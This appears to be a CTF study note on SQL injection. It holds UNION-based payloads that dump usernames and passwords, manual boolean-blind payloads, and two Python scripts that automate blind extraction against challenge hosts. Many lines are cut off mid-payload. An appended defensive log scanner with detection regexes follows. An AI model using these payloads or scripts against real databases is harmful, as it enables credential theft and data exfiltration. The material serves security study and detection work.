SQL injection -day17
2022-06-30 02:15:00 【kanna_ bush_ t】
4. UNION injection (using the single-quote-closed string type as the example)
4.5 Enumerate the databases
?id=-1' union select 1,(select group_concat(table_name) from information_sch
4.5.1 Enumerate the tables in a database
4.5.2 Enumerate the columns
?id=-1' union select 1,(select group_concat(column_name) from information_schema
4.5.3 Dump the data, joined with ~
?id=-1' union select 1,(select group_concat(concat_ws('~',username,password)
// Dump three columns at once
?id=-1' union select 1,group_concat(id,'--',username,'--',password),3 from u
5. Boolean-based blind injection
5.1 Manual: combined with Burp brute-forcing
5.1.1 Determine the length of the database name
?id=1' and length(database())=1--+
// brute-force the number 1
5.1.2 Determine the characters of the database name (security)
?id=1' and left(database(),1)='a'--+
// brute-force the letter a
?id=1' and ascii(substr(database(),1,1))='b'--+
// brute-force the ASCII value b
5.1.3 Enumerate the table users
?id=1' and ascii(substr((select table_name from information_schema.tables wh
// brute-force the number a and the number b at the same time, where b is the ASCII value
5.1.4 Enumerate the columns username and password
?id=1' and ascii(substr((select column_name from information_schema.tables w
// brute-force the number a and the number b at the same time, where b is the ASCII value
5.1.5 Dump the data
?id=1' and ascii(substr((select username from security.users limit a,1),1,1)
// brute-force the ASCII value b
?id=1' and ascii(substr((select password from security.users limit 0,1),1,1)
// brute-force the ASCII value b
5.2 Scripts
5.2.1 Direct method (slower, higher accuracy)
import requests

url = "http://ba63d0df-d99d-4cba-a692-5027868780b6.challenge.ctf.show:8080/a
b = "{zxcvbnmasdfghjklqwertyuiop-1234567890}_"  # dictionary: lowercase letters, digits, -, _, { and }
flag = ''
for i in range(1, 50):
    for h in b:
        # construct a payload that works for the target challenge environment
        payload = "' or if((mid((select group_concat(f1ag) from ctfshow_flxg
        #payload = "' or if((mid((select database()),{},1)='{}'),1,0) -- ".f
        #payload = "' or if((mid((select group_concat(column_name) from info
        #payload = "' or if((mid((select+group_concat(table_name) from infor
        #print(payload)
        data = {
            "username": payload,  # injection point
            "password": 1
        }
        s = requests.post(url, data=data)  # send the POST request
        #print(s.text)
        if "\\u5bc6\\u7801\\u9519\\u8bef" in s.text:  # the echo differs between true and false; a match means this guess was right
            flag += h  # keep the character for the correct case
            print('flag is {}'.format(flag))
            break
    if flag and flag[-1] == "}":  # the complete flag has been found
        print("flag :" + flag)
        break
5.2.2 Binary search
import requests

url = "http://ecaca1c3-ce93-4f20-82b6-ea325d85e6c3.node4.buuoj.cn:81/search.
i = 0
flag = ''
while True:
    i += 1
    header = 32  # lower bound of the printable ASCII range
    tail = 128   # upper bound
    while header < tail:
        mid = (header + tail) >> 1
        data = {
            'id': f"1^(ord(substr((select(group_concat(password))from(F1naI1y
        }
        s = requests.get(url, params=data)
        if 'Click' in s.text:
            header = mid + 1  # when the SQL condition holds
        else:
            tail = mid  # when the SQL condition fails
    if header != 32:
        flag += chr(header)
        print(flag)
    else:
        break
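As an added example from the defender's side (not part of the original notes), the scanner below flags the UNION and boolean-blind payload shapes used in sections 4 and 5 when they appear in web-server access logs, and marks a client as a suspected blind-enumeration source once it has sent repeated per-character probes. The log lines, paths and IP addresses are constructed for the example.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not from any real server): a normal
# request, a UNION probe, three boolean-blind probes from one client, and a
# ^-based binary-search probe of the kind the binary-search script sends.
SAMPLE_LOG = """\
10.0.0.5 - - [30/Jun/2022:02:15:00 +0000] "GET /Less-1/?id=1 HTTP/1.1" 200 1024
10.0.0.9 - - [30/Jun/2022:02:15:01 +0000] "GET /Less-1/?id=-1%27%20union%20select%201,(select%20group_concat(table_name)%20from%20information_schema.tables),3--+ HTTP/1.1" 200 1300
10.0.0.9 - - [30/Jun/2022:02:15:02 +0000] "GET /Less-1/?id=1%27%20and%20length(database())=8--+ HTTP/1.1" 200 1024
10.0.0.9 - - [30/Jun/2022:02:15:03 +0000] "GET /Less-1/?id=1%27%20and%20ascii(substr(database(),1,1))=115--+ HTTP/1.1" 200 1024
10.0.0.9 - - [30/Jun/2022:02:15:04 +0000] "GET /Less-1/?id=1%27%20and%20ascii(substr(database(),2,1))=101--+ HTTP/1.1" 200 1024
10.0.0.7 - - [30/Jun/2022:02:15:05 +0000] "GET /search.php?id=1%5E(ord(substr((select(group_concat(password))from(users)),1,1))%3E64) HTTP/1.1" 200 980
"""

LOG_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP')

# Each rule is (name, regex applied to the URL-decoded, lower-cased query string).
RULES = [
    ("union_select", re.compile(r"\bunion\b[\s/*]+(?:all\s+)?select\b")),
    ("schema_enum", re.compile(r"information_schema\.(?:tables|columns|schemata)")),
    # the per-character extraction idiom of boolean blind injection
    ("blind_char", re.compile(r"\b(?:ascii|ord)\s*\(\s*(?:substr|substring|mid)\s*\(")),
    ("blind_len", re.compile(r"\blength\s*\(\s*database\s*\(\s*\)")),
    ("blind_if", re.compile(r"\bif\s*\(.*\b(?:mid|substr)\s*\(")),
]

def scan_log(text, blind_threshold=2):
    """Return (findings, suspects): findings is a list of (client, rule, query);
    suspects is the set of clients that sent at least blind_threshold blind probes,
    the signature of character-by-character extraction."""
    findings, blind_hits = [], Counter()
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        client, path = m.groups()
        query = unquote_plus(path.partition("?")[2]).lower()
        for name, rx in RULES:
            if rx.search(query):
                findings.append((client, name, query))
                if name.startswith("blind_"):
                    blind_hits[client] += 1
    suspects = {c for c, n in blind_hits.items() if n >= blind_threshold}
    return findings, suspects
```

A single blind probe (10.0.0.7) is reported but does not cross the threshold; the repeated probes from 10.0.0.9 do, which is the pattern to alert on.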